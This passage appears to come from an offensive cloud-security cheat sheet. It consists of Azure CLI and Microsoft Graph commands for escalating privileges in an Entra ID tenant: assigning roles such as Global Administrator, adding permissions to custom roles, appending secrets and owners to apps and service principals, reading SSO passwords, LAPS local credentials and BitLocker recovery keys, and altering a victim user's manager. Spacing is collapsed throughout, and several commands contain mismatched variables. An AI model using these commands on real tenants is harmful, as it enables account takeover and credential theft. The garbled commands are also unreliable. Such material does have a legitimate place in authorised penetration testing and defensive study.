# List enabled built-in rolesazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/directoryRoles"# Give role (Global Administrator?) to a userroleId="<roleId>"userId="<userId>"azrest--methodPOST \--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \--headers "Content-Type=application/json" \--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"
ロールに権限を追加する:
# List only custom rolesazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)'
# Change the permissions of a custom roleazrest--methodPATCH \--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/<role-id>" \--headers "Content-Type=application/json" \--body '{"description": "Update basic properties of application registrations","rolePermissions": [{"allowedResourceActions": ["microsoft.directory/applications/credentials/update"]}]}'
# Generate a new password without overwritting old onesazadappcredentialreset--id<appId>--append# Generate a new certificate without overwritting old onesazadappcredentialreset--id<appId>--create-cert
# Add new ownerspId="<spId>"userId="<userId>"azrest--methodPOST \--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \--headers "Content-Type=application/json" \--body "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"}"azadspcredentialreset--id<sp-id>--append# You can check the owners withazadspownerlist--id<spId>
# Generate SSO creds for a user or a groupspID="<spId>"user_or_group_id="<id>"username="<username>"password="<password>"azrest--methodPOST \--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \--headers "Content-Type=application/json" \--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"
# Get credentials of a specific credIDcredID="<credID>"azrest--methodPOST \--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \--headers "Content-Type=application/json" \--body "{\"id\": \"$credID\"}"
#e.g. change manager of a uservictimUser="<userID>"managerUser="<userID>"azrest--methodPUT \--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \--headers "Content-Type=application/json" \--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'#e.g. change department of a userazrest--methodPATCH \--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \--headers "Content-Type=application/json" \--body "{\"department\": \"security\"}"
# List deviceLocalCredentialsazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"# Get credentialsdeviceLC="<deviceLCID>"azrest--methodGET \--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \
# List recovery keysazrest--methodGET \--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"# Get keyrecoveryKeyId="<recoveryKeyId>"azrest--methodGET \--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"